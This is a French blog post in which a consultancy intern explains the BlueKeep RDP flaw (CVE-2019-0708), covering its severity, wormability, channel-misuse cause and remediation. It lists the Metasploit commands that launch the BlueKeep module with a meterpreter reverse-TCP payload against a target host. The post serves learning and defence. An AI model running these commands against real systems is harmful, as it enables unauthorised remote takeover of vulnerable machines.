Stage chez Thierry Meyer Consultants : Recherche sur Bluekeep

on

Lors de ma dernière semaine de stage chez Thierry Meyer Consultants, il m’a été demandé de faire des recherche sur la faille de sécurité appelé Bluekeep et j’ai essayé de l’exploiter avec une machine virtuelle et l’exploit sur metasploit.

 

Présentation de Bluekeep :

 

Bluekeep est une faille de sécurité sortie en Mai 2019 qui concerne le service Microsoft Remote Desktop Protocole qui permet de de faire de l’éxécution de code à distance.

Cette faille de sécurité à été découvertes par le centre national de cybersécurité du Royaume Uni et à été rapporté par microsoft en mai 2019 elle est liée par la CVE-2019-0708
Cette vulnérabilité est de type RCE (Remote Code Execution), c’est à dire qu’elle permet d’exécuter du code à distance sur une machine vulnérable.

Le score CVSS attribué à cette CVE est de 10 car elle permet de devenir administrateur d’une machine vulnérable facilement sans avoir d’authentification. Il est donc possible de compromettre complètement la machine de manière simple (impact fort, pas d’authentification et complexité faible).

La NSA et Microsoft ont déclaré que la faille est « Wormable », c’est à dire qu’il est possible d’automatiser les attaques sans aucune action humaine. Ce qui permet au « worm » de se propager à travers les réseaux.

En septembre 2019 l’exploit bluekeep à été rendu public via le module Metasploit, Désormais tous le monde peut s’en servir mais toutefois cela est trés limité car il est nécéssaire d’avoir le Windows NPP start address pour pouvoir mener à bien l’exploit et il arrive fréquemment que l’exploit resulte sur un BSOD.

 

Fonctionnement de Bluekeep :

 

Cette faille vient du protocole RDP et plus particulierement des canaux utilisés:

– RDP utilise des canaux virtuels pour la connexion
– RDP utilise toujours le même canal, SVC31
– Les canaux sont sélectionnés avant le « Security Commencement », ce qui le rend « Wormable »
– Les SVC sont utilisés à la connexion, les DVC sont créés et détruits à la demande
– Lors d’une connexion, le DVC « MS_T120 » est utilisé avec le SVC31

 

 

La faille vient donc si on utilise un DVC « MS_T120 » sur un autre canal que le SVC31. Cela créé une corruption de la mémoire et permet d’exécuter du code à distance.

 

Utilisation avec Metasploit :

 

Pour commencer il faut lancer metasploit puis utiliser l’exploit qui se situe dans exploit/windows/rdp/cve_2019_0708_bluekeep_rce

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Ensuite il est nécéssaire de configurer le Remote Host le local Host et le payload que l’on souhaite utiliser

set RHOST X.X.0.2(target)
set LHOST X.X.0.1(attacker)
set payload windows/x64/meterpreter/reverse_tcp
set target (en fonction de la cible Vm ou non)

Une fois les parametres appliqué on a plus qu’a vérifier que l’exploit est possible avec un check puis on lance l’exploit avec exploit

 

Remédiation :

 

Pour remédier à cette faille il faut appliquer les correctifs de sécurité ou appliquer le NLA sur les options RDP.

 

Conclusion :

 

Ce travail de recherche sur Bluekeep m’a appris à faire des recherches pertinente et à étudier les différents bulletin de sécurité qui sont majoritairement en anglais pour comprendre comment marche la vulnérabilité et son exploit, mais c’est un travail très intéréssant qui permet de mieux utiliser une attaque car si on tente un exploit Bluekeep sans être renseigner sur la faille on peut faire des bluescreen sur la cible et par la même occasion causer des dommages que ne l’on voudrait pas sur un SI que l’on pentest et par la même occasion donner à l’équipe Blueteam une information sur notre présence dans leurs système.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *